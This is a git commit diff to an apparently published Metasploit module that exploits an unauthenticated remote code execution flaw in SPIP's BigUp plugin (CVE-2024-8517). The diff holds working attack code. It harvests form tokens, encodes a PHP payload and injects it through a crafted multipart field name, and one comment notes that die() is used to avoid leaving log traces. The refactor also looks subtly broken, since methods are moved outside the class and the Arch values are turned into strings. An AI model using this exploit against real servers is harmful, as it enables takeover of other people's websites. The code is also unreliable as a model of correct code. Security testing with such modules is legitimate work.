Add some comments and CVE ID

Chocapikk · Chocapikk · commit 8b1e1dab1b0f · 2024-09-07T03:09:42.000+02:00
diff --git a/modules/exploits/multi/http/spip_bigup_unauth_rce.rb b/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
@@ -19,7 +19,7 @@ def initialize(info = {})
         'Description' => %q{
           This module exploits a Remote Code Execution vulnerability in the BigUp plugin of SPIP.
           The vulnerability lies in the `lister_fichiers_par_champs` function, which is triggered
-          when the `bigup_retrouver_fichiers` parameter is set to `1`. By exploiting the improper
+          when the `bigup_retrouver_fichiers` parameter is set to any value. By exploiting the improper
           handling of multipart form data in file uploads, an attacker can inject and execute
           arbitrary PHP code on the target server.
 
@@ -29,17 +29,18 @@ def initialize(info = {})
           4.3.2, 4.2.16, and 4.1.18.
         },
         'Author' => [
-          'Vozec', # Vulnerability Discoverer
-          'Laluka', # Vulnerability Discoverer
-          'Julien Voisin', # Code Review
+          'Vozec',            # Vulnerability Discovery
+          'Laluka',           # Vulnerability Discovery
+          'Julien Voisin',    # Code Review
           'Valentin Lobstein' # Metasploit Module
         ],
         'License' => MSF_LICENSE,
         'References' => [
+          ['CVE', '2024-8517'],
           ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html']
         ],
         'Platform' => %w[php unix linux win],
-        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Arch' => %w[ARCH_PHP ARCH_CMD],
         'Targets' => [
           [
             'PHP In-Memory', {
@@ -103,19 +104,22 @@ def check
 
     unless plugin_version
       print_warning('Could not determine the version of the bigup plugin.')
-      return Exploit::CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")
+      return CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")
     end
 
-    return Exploit::CheckCode::Appears("The detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.") if plugin_version < Rex::Version.new('3.1.6')
+    return CheckCode::Appears("The detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.") if plugin_version < Rex::Version.new('3.1.6')
 
     CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")
   end
 
+  # This function tests several pages to find a form with a valid CSRF token and its corresponding action.
+  # It allows the user to specify a URL via the FORM_PAGE option (e.g., spip.php?article1).
+  # We need to check multiple pages because the configuration of SPIP can vary.
   def get_form_data
     pages = []
 
     form_page = datastore['FORM_PAGE']
-    pages << form_page if form_page && form_page.downcase != 'auto'
+    pages << form_page if form_page&.downcase != 'auto'
 
     pages.concat(%w[login spip_pass contact]) if pages.empty?
 
@@ -132,48 +136,61 @@ def get_form_data
       next unless action && args
 
       print_status("Found formulaire_action: #{action}")
-      print_status("Found formulaire_action_args: #{args}")
+      print_status("Found formulaire_action_args: #{args[0..20]}...")
       return { action: action, args: args }
     end
 
     nil
   end
+end
 
-  def php_exec_cmd(encoded_payload)
-    vars = Rex::RandomIdentifier::Generator.new
-    dis = "$#{vars[:dis]}"
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-    <<-END_OF_PHP_CODE
+# This function generates PHP code to execute a given payload on the target.
+# We use Rex::RandomIdentifier::Generator to create a random variable name to avoid conflicts.
+# The payload is encoded in base64 to prevent issues with special characters.
+# The generated PHP code includes the necessary preamble and system block to execute the payload.
+# This approach allows us to test multiple functions and not limit ourselves to potentially dangerous functions like 'system' which might be disabled.
+def php_exec_cmd(encoded_payload)
+  vars = Rex::RandomIdentifier::Generator.new
+  dis = "$#{vars[:dis]}"
+  encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
+  <<-END_OF_PHP_CODE
             #{php_preamble(disabled_varname: dis)}
             $c = base64_decode("#{encoded_clean_payload}");
             #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
+  END_OF_PHP_CODE
+end
+
+def exploit
+  form_data = get_form_data
+
+  unless form_data
+    fail_with(Failure::NotFound, 'Could not retrieve formulaire_action or formulaire_action_args value from any page.')
   end
 
-  def exploit
-    form_data = get_form_data
+  print_status('Preparing to send exploit payload to the target...')
 
-    unless form_data
-      fail_with(Failure::NotFound, 'Could not retrieve formulaire_action or formulaire_action_args value from any page.')
-    end
+  phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
+  b64_payload = framework.encoders.create('php/base64').encode(phped_payload).gsub(';', '')
 
-    print_status('Preparing to send exploit payload to the target...')
+  post_data = Rex::MIME::Message.new
 
-    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
-    b64_payload = framework.encoders.create('php/base64').encode(phped_payload).gsub(';', '')
+  # This line is necessary for the form to be valid, works in tandem with formulaire_action_args
+  post_data.add_part(form_data[:action], nil, nil, 'form-data; name="formulaire_action"')
 
-    post_data = Rex::MIME::Message.new
+  # This value is necessary for $_FILES to be used and for the bigup plugin to be "activated" for this request, thus triggering the vulnerability
+  post_data.add_part(Rex::Text.rand_text_alphanumeric(4, 8), nil, nil, 'form-data; name="bigup_retrouver_fichiers"')
 
-    post_data.add_part(form_data[:action], nil, nil, 'form-data; name="formulaire_action"')
-    post_data.add_part('1', nil, nil, 'form-data; name="bigup_retrouver_fichiers"')
-    post_data.add_part('', nil, nil, "form-data; name=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}['.#{b64_payload}.die().']\"; filename=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}\"")
-    post_data.add_part(form_data[:args], nil, nil, 'form-data; name="formulaire_action_args"')
+  # Injection is performed here. The die() function is used to avoid leaving traces in the logs,
+  # prevent errors, and stop the execution of PHP after the injection.
+  post_data.add_part('', nil, nil, "form-data; name=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}['.#{b64_payload}.die().']\"; filename=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}\"")
 
-    send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'spip.php'),
-      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
-      'data' => post_data.to_s
-    }, 1)
-  end
+  # This is necessary for the form to be accepted
+  post_data.add_part(form_data[:args], nil, nil, 'form-data; name="formulaire_action_args"')
+
+  send_request_cgi({
+    'method' => 'POST',
+    'uri' => normalize_uri(target_uri.path, 'spip.php'),
+    'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+    'data' => post_data.to_s
+  }, 1)
 end
